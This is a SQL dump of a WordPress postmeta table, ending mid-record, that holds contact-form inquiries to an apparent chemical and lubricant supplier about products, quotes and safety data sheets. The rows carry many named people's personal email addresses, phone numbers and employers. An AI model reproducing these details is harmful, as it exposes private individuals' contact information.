INSERT INTO `wp_postmeta` VALUES (37840, 4256, '_field_16', 'Hello,\r\n\r\nIs there any special cleaning requirements for this lube if we were to put it one of our bearings?\r\n\r\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (37841, 4256, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (37842, 4256, '_sub_id', '4256'); 
INSERT INTO `wp_postmeta` VALUES (37843, 4257, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37844, 4257, '_seq_num', '661'); 
INSERT INTO `wp_postmeta` VALUES (37845, 4257, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37846, 4257, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37847, 4257, '_field_1', 'Joe Schroder'); 
INSERT INTO `wp_postmeta` VALUES (37848, 4257, '_field_10', 'I.F. Engineering Corp'); 
INSERT INTO `wp_postmeta` VALUES (37849, 4257, '_field_2', 'joe@ifengineering.com'); 
INSERT INTO `wp_postmeta` VALUES (37850, 4257, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (37851, 4257, '_field_3', 'Hi, Currently we are using your MS-552N for cleaning flux from our electronic assemblies. We order it in 5 gallon pails. Costs are high. What other solvent product do you sell that be more of a cost effective solution but still maintain the performance of 552? \nThanks, Joe'); 
INSERT INTO `wp_postmeta` VALUES (37852, 4257, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37853, 4257, '_sub_id', '4257'); 
INSERT INTO `wp_postmeta` VALUES (37854, 4258, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (37855, 4258, '_seq_num', '297'); 
INSERT INTO `wp_postmeta` VALUES (37856, 4258, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37857, 4258, '_field_12', 'Alain Lortie'); 
INSERT INTO `wp_postmeta` VALUES (37858, 4258, '_field_13', 'Professional artist '); 
INSERT INTO `wp_postmeta` VALUES (37859, 4258, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (37860, 4258, '_field_14', 'info@alainlortie.art'); 
INSERT INTO `wp_postmeta` VALUES (37861, 4258, '_field_15', '(418) 770-1454'); 
INSERT INTO `wp_postmeta` VALUES (37862, 4258, '_field_16', 'Hi, I&#039;m in the process of building an exterior sculpture for the city of Chibougamau in partnership with Les Chantiers Chibougamau. It is in wood and it should last 20 years with minimum care our reputation depend on the result over the years . It is made with  architectural Nordic Lam wood ( 70% grey pine 30% black spruce 12% humidity)  With epoxy should i apply ?  it must have a excellent UV protection , totally clear year after year,  water and frost resistant  what do you propose. The surface to cover is 106 square feet'); 
INSERT INTO `wp_postmeta` VALUES (37863, 4258, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (37864, 4258, '_sub_id', '4258'); 
INSERT INTO `wp_postmeta` VALUES (37865, 4259, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37866, 4259, '_seq_num', '662'); 
INSERT INTO `wp_postmeta` VALUES (37867, 4259, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37868, 4259, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37869, 4259, '_field_1', 'Tom Alter'); 
INSERT INTO `wp_postmeta` VALUES (37870, 4259, '_field_10', 'Glazeen industrial Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (37871, 4259, '_field_2', 'Tom@glazeen.com'); 
INSERT INTO `wp_postmeta` VALUES (37872, 4259, '_field_8', '(312) 909-0994'); 
INSERT INTO `wp_postmeta` VALUES (37873, 4259, '_field_3', 'I&#039;m interested in selling Krytox through my webstore, www.glazeenindustriallubricants.com and direct in the Chicago market. '); 
INSERT INTO `wp_postmeta` VALUES (37874, 4259, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37875, 4259, '_sub_id', '4259'); 
INSERT INTO `wp_postmeta` VALUES (37876, 4260, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37877, 4260, '_seq_num', '663'); 
INSERT INTO `wp_postmeta` VALUES (37878, 4260, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37879, 4260, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37880, 4260, '_field_1', 'Michael Burgman'); 
INSERT INTO `wp_postmeta` VALUES (37881, 4260, '_field_10', 'Interstate Chemical Co'); 
INSERT INTO `wp_postmeta` VALUES (37882, 4260, '_field_2', 'mburgman@interstatechemical.com'); 
INSERT INTO `wp_postmeta` VALUES (37883, 4260, '_field_8', '(505) 249-4310'); 
INSERT INTO `wp_postmeta` VALUES (37884, 4260, '_field_3', 'looking for either a functional or direct offset for Chemtrend PU-11335 mold release.  The application is brake lining manufacturing.\n\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (37885, 4260, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37886, 4260, '_sub_id', '4260'); 
INSERT INTO `wp_postmeta` VALUES (37887, 4261, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (37888, 4261, '_seq_num', '298'); 
INSERT INTO `wp_postmeta` VALUES (37889, 4261, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37890, 4261, '_field_12', 'Francisco Perez'); 
INSERT INTO `wp_postmeta` VALUES (37891, 4261, '_field_13', 'Vernay'); 
INSERT INTO `wp_postmeta` VALUES (37892, 4261, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (37893, 4261, '_field_14', 'franciscoperez@vernay.com'); 
INSERT INTO `wp_postmeta` VALUES (37894, 4261, '_field_15', '(404) 998-8541'); 
INSERT INTO `wp_postmeta` VALUES (37895, 4261, '_field_16', 'Hi, I&#039;m looking for a semi permanent mold release that I would like to use in my injection process, the material I&#039;m molding is EPDM w/ sulfur cure system. Thanks'); 
INSERT INTO `wp_postmeta` VALUES (37896, 4261, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (37897, 4261, '_sub_id', '4261'); 
INSERT INTO `wp_postmeta` VALUES (37898, 4262, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37899, 4262, '_seq_num', '664'); 
INSERT INTO `wp_postmeta` VALUES (37900, 4262, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37901, 4262, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37902, 4262, '_field_1', 'Mike Davis'); 
INSERT INTO `wp_postmeta` VALUES (37903, 4262, '_field_10', 'Tekna Seal LLC'); 
INSERT INTO `wp_postmeta` VALUES (37904, 4262, '_field_2', 'mdavis@teknaseal.com'); 
INSERT INTO `wp_postmeta` VALUES (37905, 4262, '_field_8', '(763) 354-2658'); 
INSERT INTO `wp_postmeta` VALUES (37906, 4262, '_field_3', 'Can you quote 1 pint and 1 gallon of EPON 828?\r\n\r\nAlso my customer is asking us to cure it with Epikure Z. I don&#039;t see that on your website. Is that not available any longer? Please recommend a suitable alternative and quote that as well.\r\n\r\nThanks!'); 
INSERT INTO `wp_postmeta` VALUES (37907, 4262, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37908, 4262, '_sub_id', '4262'); 
INSERT INTO `wp_postmeta` VALUES (37909, 4263, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (37910, 4263, '_seq_num', '299'); 
INSERT INTO `wp_postmeta` VALUES (37911, 4263, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37912, 4263, '_field_12', 'Alexander `'); 
INSERT INTO `wp_postmeta` VALUES (37913, 4263, '_field_13', 'RUSKYGROUP'); 
INSERT INTO `wp_postmeta` VALUES (37914, 4263, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (37915, 4263, '_field_14', 'ar@itrusky.ru'); 
INSERT INTO `wp_postmeta` VALUES (37916, 4263, '_field_15', '(929) 913-9737'); 
INSERT INTO `wp_postmeta` VALUES (37917, 4263, '_field_16', 'Good day,\r\n\r\nDear Sir/Madam\r\n\r\nI kindly ask you to advise a reference to the specification which qualifies the following product:\r\n\r\n1.	 MS-122XD, Lubricant, 14 OZ aerosol can\r\n\r\nMany thanks in advance\r\n'); 
INSERT INTO `wp_postmeta` VALUES (37918, 4263, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (37919, 4263, '_sub_id', '4263'); 
INSERT INTO `wp_postmeta` VALUES (37920, 4264, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37921, 4264, '_seq_num', '665'); 
INSERT INTO `wp_postmeta` VALUES (37922, 4264, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37923, 4264, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37924, 4264, '_field_1', 'Tony Pisani'); 
INSERT INTO `wp_postmeta` VALUES (37925, 4264, '_field_10', 'Tony Pisani Inc.'); 
INSERT INTO `wp_postmeta` VALUES (37926, 4264, '_field_2', 'tonypisaniinc@sbcglobal.net'); 
INSERT INTO `wp_postmeta` VALUES (37927, 4264, '_field_8', '(916) 390-6335'); 
INSERT INTO `wp_postmeta` VALUES (37928, 4264, '_field_3', 'Please be so kind as to quote Dupont Krytox 105 in quantities of 1, 3, and 5. Each for 2 OZ, 8 Ounce Tube and 0.5KG packaging.\n\nThank you'); 
INSERT INTO `wp_postmeta` VALUES (37929, 4264, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37930, 4264, '_sub_id', '4264'); 
INSERT INTO `wp_postmeta` VALUES (37931, 4265, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37932, 4265, '_seq_num', '666'); 
INSERT INTO `wp_postmeta` VALUES (37933, 4265, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37934, 4265, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37935, 4265, '_field_1', 'Jane Schinske'); 
INSERT INTO `wp_postmeta` VALUES (37936, 4265, '_field_10', 'Safari Circuits'); 
INSERT INTO `wp_postmeta` VALUES (37937, 4265, '_field_2', 'jlschinske@safaricircuits.com'); 
INSERT INTO `wp_postmeta` VALUES (37938, 4265, '_field_8', '(269) 694-9471'); 
INSERT INTO `wp_postmeta` VALUES (37939, 4265, '_field_3', 'Please advise pricing and lead time for 1  8OZ TUBE GPL 205.  Or advise a distributer I can order from.  I am located in Otsego, MI'); 
INSERT INTO `wp_postmeta` VALUES (37940, 4265, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37941, 4265, '_sub_id', '4265'); 
INSERT INTO `wp_postmeta` VALUES (37942, 4266, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (37943, 4266, '_seq_num', '300'); 
INSERT INTO `wp_postmeta` VALUES (37944, 4266, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37945, 4266, '_field_12', 'Kenneth Monroe'); 
INSERT INTO `wp_postmeta` VALUES (37946, 4266, '_field_13', 'Lockheed Martin'); 
INSERT INTO `wp_postmeta` VALUES (37947, 4266, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (37948, 4266, '_field_14', 'kenneth.r.monroe@lmco.com'); 
INSERT INTO `wp_postmeta` VALUES (37949, 4266, '_field_15', '(864) 299-7292'); 
INSERT INTO `wp_postmeta` VALUES (37950, 4266, '_field_16', 'I just registered on your site to be able to access the SDS.  I am trying to obtain the SDS for MS-260M (pump-spray version).  I see it listed but when the PDF opens up it is the same as the MS-260 (aerosol version).  Can you email me the SDS for MS-260M (pump-spray version)?  Also, if you have a TDS for this product that would be helpful.\nThanks,\nKenneth Monroe'); 
INSERT INTO `wp_postmeta` VALUES (37951, 4266, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (37952, 4266, '_sub_id', '4266'); 
INSERT INTO `wp_postmeta` VALUES (37953, 4267, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37954, 4267, '_seq_num', '667'); 
INSERT INTO `wp_postmeta` VALUES (37955, 4267, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37956, 4267, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37957, 4267, '_field_1', 'josilane porfirio monteiro'); 
INSERT INTO `wp_postmeta` VALUES (37958, 4267, '_field_10', 'Itaguai Construções Navais'); 
INSERT INTO `wp_postmeta` VALUES (37959, 4267, '_field_2', 'josimonteiro@icnavais.com'); 
INSERT INTO `wp_postmeta` VALUES (37960, 4267, '_field_8', '(213) 616-1488'); 
INSERT INTO `wp_postmeta` VALUES (37961, 4267, '_field_3', '\nIn 2013 we bought Epoxy 907 (Adherent System), but we didn&#039;t use it yet, so Would we like to know if it is still valid.\n\nWhat is the shelf life of this product?\n\nThank you.\n\n'); 
INSERT INTO `wp_postmeta` VALUES (37962, 4267, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37963, 4267, '_sub_id', '4267'); 
INSERT INTO `wp_postmeta` VALUES (37964, 4268, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37965, 4268, '_seq_num', '668'); 
INSERT INTO `wp_postmeta` VALUES (37966, 4268, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37967, 4268, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37968, 4268, '_field_1', 'lilian lee'); 
INSERT INTO `wp_postmeta` VALUES (37969, 4268, '_field_10', 'Auzana Industries Sdn Bhd'); 
INSERT INTO `wp_postmeta` VALUES (37970, 4268, '_field_2', 'lilian@auzana.com'); 
INSERT INTO `wp_postmeta` VALUES (37971, 4268, '_field_8', '(607) 863-7085'); 
INSERT INTO `wp_postmeta` VALUES (37972, 4268, '_field_3', 'I looking for MS-470N conformal coating packing with 14oz aerosol can , may i know where can i buy this item ? or any distributor u hv in Malaysia &amp; Singapore ? advise pls'); 
INSERT INTO `wp_postmeta` VALUES (37973, 4268, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37974, 4268, '_sub_id', '4268'); 
INSERT INTO `wp_postmeta` VALUES (37975, 4269, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37976, 4269, '_seq_num', '669'); 
INSERT INTO `wp_postmeta` VALUES (37977, 4269, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37978, 4269, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37979, 4269, '_field_1', 'lizhou'); 
INSERT INTO `wp_postmeta` VALUES (37980, 4269, '_field_10', 'Chongqing bo electric mechanical and electrical co., LTD'); 
INSERT INTO `wp_postmeta` VALUES (37981, 4269, '_field_2', '857120400@qq.com'); 
INSERT INTO `wp_postmeta` VALUES (37982, 4269, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (37983, 4269, '_field_3', 'Product consulting：\r\nCleaning fluidmiller-stephenson SAFEZONE Cleaner MS262，1000ml\r\nHow do you buy this product in China, please? Please provide contact information, thank you.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (37984, 4269, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37985, 4269, '_sub_id', '4269'); 
INSERT INTO `wp_postmeta` VALUES (37986, 4270, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37987, 4270, '_seq_num', '670'); 
INSERT INTO `wp_postmeta` VALUES (37988, 4270, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37989, 4270, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37990, 4270, '_field_1', 'William  J. Rote '); 
INSERT INTO `wp_postmeta` VALUES (37991, 4270, '_field_10', 'WJROTE@GMAIL.COM CONSULTANTS '); 
INSERT INTO `wp_postmeta` VALUES (37992, 4270, '_field_2', 'wjrote@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (37993, 4270, '_field_8', '(193) 775-0335'); 
INSERT INTO `wp_postmeta` VALUES (37994, 4270, '_field_3', 'I was involved in a Marketing Campaign using Krytox for Powder Metallurgy Bearings for Automotive applications 20 years ago. \r\nPlease send current information. \r\nRegards, W.J. Rote '); 
INSERT INTO `wp_postmeta` VALUES (37995, 4270, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37996, 4270, '_sub_id', '4270'); 
INSERT INTO `wp_postmeta` VALUES (37997, 4271, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37998, 4271, '_seq_num', '671'); 
INSERT INTO `wp_postmeta` VALUES (37999, 4271, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38000, 4271, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38001, 4271, '_field_1', 'VEENA'); 
INSERT INTO `wp_postmeta` VALUES (38002, 4271, '_field_10', 'ARON UNIVERSAL LTD'); 
INSERT INTO `wp_postmeta` VALUES (38003, 4271, '_field_2', 'veena@aronuniversal.com'); 
INSERT INTO `wp_postmeta` VALUES (38004, 4271, '_field_8', '(918) 141-6222'); 
INSERT INTO `wp_postmeta` VALUES (38005, 4271, '_field_3', '\nWe are one of the leading manufacturers in India of daylight fluorescent pigments, fluorescent Ink concentrates (for offset and lithographic printing) and  fluorescent dispersions ,  catering to  major applications in inks, textile, plastics, paper, rubber and paints industries .\nWe are looking for  VAZO 52/57 for our new product development.  Request you to organize  500gms  to 1 kg of free  sample along with MSDS, TDS and COA of the same in order evaluate your material and  use in our application test.\nOnce the material is approved we would go for the bulk quantity.  Please also indicate your pack size and quote for the same along with required lead time.\nYour immediate \n'); 
INSERT INTO `wp_postmeta` VALUES (38006, 4271, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38007, 4271, '_sub_id', '4271'); 
INSERT INTO `wp_postmeta` VALUES (38008, 4272, '_wp_attached_file', '2016/09/260M-15.pdf'); 
INSERT INTO `wp_postmeta` VALUES (38009, 4275, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38010, 4275, '_seq_num', '672'); 
INSERT INTO `wp_postmeta` VALUES (38011, 4275, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38012, 4275, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38013, 4275, '_field_1', 'Jessica Peters'); 
INSERT INTO `wp_postmeta` VALUES (38014, 4275, '_field_10', 'Penn State University'); 
INSERT INTO `wp_postmeta` VALUES (38015, 4275, '_field_2', 'jlj52@arl.psu.edu'); 
INSERT INTO `wp_postmeta` VALUES (38016, 4275, '_field_8', '814-865-2906'); 
INSERT INTO `wp_postmeta` VALUES (38017, 4275, '_field_3', 'I would like to request a quote on the following product:\r\nNSN 6850-01-346-9144 (14 oz) AeroDuster MS-222N\r\nNon-flammable\r\n\r\nThanks so much for your help in this matter!!'); 
INSERT INTO `wp_postmeta` VALUES (38018, 4275, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38019, 4275, '_sub_id', '4275'); 
INSERT INTO `wp_postmeta` VALUES (38020, 4276, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38021, 4276, '_seq_num', '673'); 
INSERT INTO `wp_postmeta` VALUES (38022, 4276, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38023, 4276, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38024, 4276, '_field_1', 'Connor Eaton'); 
INSERT INTO `wp_postmeta` VALUES (38025, 4276, '_field_10', 'Morgan Advanced Materials'); 
INSERT INTO `wp_postmeta` VALUES (38026, 4276, '_field_2', 'connor.eaton@morganplc.com'); 
INSERT INTO `wp_postmeta` VALUES (38027, 4276, '_field_8', '(706) 945-3496'); 
INSERT INTO `wp_postmeta` VALUES (38028, 4276, '_field_3', 'We are currently looking for a mold release agent that is environmentally friendly.  Water based lubricant is preferable.'); 
INSERT INTO `wp_postmeta` VALUES (38029, 4276, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38030, 4276, '_sub_id', '4276'); 
INSERT INTO `wp_postmeta` VALUES (38031, 4277, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38032, 4277, '_seq_num', '674'); 
INSERT INTO `wp_postmeta` VALUES (38033, 4277, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38034, 4277, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38035, 4277, '_field_1', 'JAVIER DE LA QUINTANA'); 
INSERT INTO `wp_postmeta` VALUES (38036, 4277, '_field_10', 'SOUTH SEAS AVIATION '); 
INSERT INTO `wp_postmeta` VALUES (38037, 4277, '_field_2', 'javier@southseas.aero'); 
INSERT INTO `wp_postmeta` VALUES (38038, 4277, '_field_8', '(954) 306-6063'); 
INSERT INTO `wp_postmeta` VALUES (38039, 4277, '_field_3', 'please I need price and availability for ;\nMIL-PRF-27617, TYPE 1   /   GREASE AIRCRAFT AND INSTRUMENT FUEL AND OXIDIZER RESISTANT / 1EA \nMIL-PRF-25567, TYPE 1   /   LEAK DETECTION COMPOUND, OXYGEN SYSTEMS / 1EA \nplease advise ASAP'); 
INSERT INTO `wp_postmeta` VALUES (38040, 4277, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38041, 4277, '_sub_id', '4277'); 
INSERT INTO `wp_postmeta` VALUES (38042, 4278, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (38043, 4278, '_seq_num', '301'); 
INSERT INTO `wp_postmeta` VALUES (38044, 4278, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38045, 4278, '_field_12', 'Monish Doshi'); 
INSERT INTO `wp_postmeta` VALUES (38046, 4278, '_field_13', 'Glenair, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (38047, 4278, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (38048, 4278, '_field_14', 'mdoshi@glenair.com'); 
INSERT INTO `wp_postmeta` VALUES (38049, 4278, '_field_15', '(818) 247-6000'); 
INSERT INTO `wp_postmeta` VALUES (38050, 4278, '_field_16', 'I have an old hardcopy of a Krytox Grease Cross Reference List that shows that GPL 206 is a general purpose version of 240AC.  I am looking for an up-to-date electronic copy of the cross reference list.  Also, any info that may explain the difference between GPL 206 and 240AC would be greatly appreciated.\n\nThank you !!!'); 
INSERT INTO `wp_postmeta` VALUES (38051, 4278, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (38052, 4278, '_sub_id', '4278'); 
INSERT INTO `wp_postmeta` VALUES (38053, 4279, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (38054, 4279, '_seq_num', '302'); 
INSERT INTO `wp_postmeta` VALUES (38055, 4279, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38056, 4279, '_field_12', 'Andy McCarron'); 
INSERT INTO `wp_postmeta` VALUES (38057, 4279, '_field_13', 'Cambridge Technology'); 
INSERT INTO `wp_postmeta` VALUES (38058, 4279, '_field_18', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (38059, 4279, '_field_14', 'andy.mccarron@cambridgetechnology.com'); 
INSERT INTO `wp_postmeta` VALUES (38060, 4279, '_field_15', '(781) 266-5677'); 
INSERT INTO `wp_postmeta` VALUES (38061, 4279, '_field_16', 'Hi, \r\nCan you forward the material properties for cured EPON 828? Specifically, I&#039;m looking for:\r\nDensity, Modulous of Elasticity, Poisson&#039;s ratio, Specific Heat Capacity, Coefficient of Thermal Expansion, Thermal conductivity\r\ndo you have this data at room temperature ~22 C and higher temperatures up to 90C?\r\nStress strain curves would be useful if available. \r\nThanks. '); 
INSERT INTO `wp_postmeta` VALUES (38062, 4279, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (38063, 4279, '_sub_id', '4279'); 
INSERT INTO `wp_postmeta` VALUES (38064, 4280, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (38065, 4280, '_seq_num', '303'); 
INSERT INTO `wp_postmeta` VALUES (38066, 4280, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38067, 4280, '_field_12', 'John Farrell'); 
INSERT INTO `wp_postmeta` VALUES (38068, 4280, '_field_13', 'GE Sensing EMEA'); 
INSERT INTO `wp_postmeta` VALUES (38069, 4280, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (38070, 4280, '_field_14', 'john.farrell@ge.com'); 
INSERT INTO `wp_postmeta` VALUES (38071, 4280, '_field_15', '(087) 118-2108'); 
INSERT INTO `wp_postmeta` VALUES (38072, 4280, '_field_16', 'I am looking to get a EU SDS sheet for MS-122RB,\n'); 
INSERT INTO `wp_postmeta` VALUES (38073, 4280, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (38074, 4280, '_sub_id', '4280'); 
INSERT INTO `wp_postmeta` VALUES (38075, 4281, '_wp_attached_file', '2017/05/shutterstock_92795974.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38076, 4281, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:33:"2017/05/shutterstock_92795974.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_92795974-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_92795974-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_92795974-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_92795974-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_92795974-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_92795974-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_92795974-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (38077, 4282, '_wp_attached_file', '2017/05/shutterstock_566838472.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38078, 4282, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/05/shutterstock_566838472.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_566838472-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_566838472-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_566838472-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_566838472-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_566838472-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_566838472-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_566838472-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d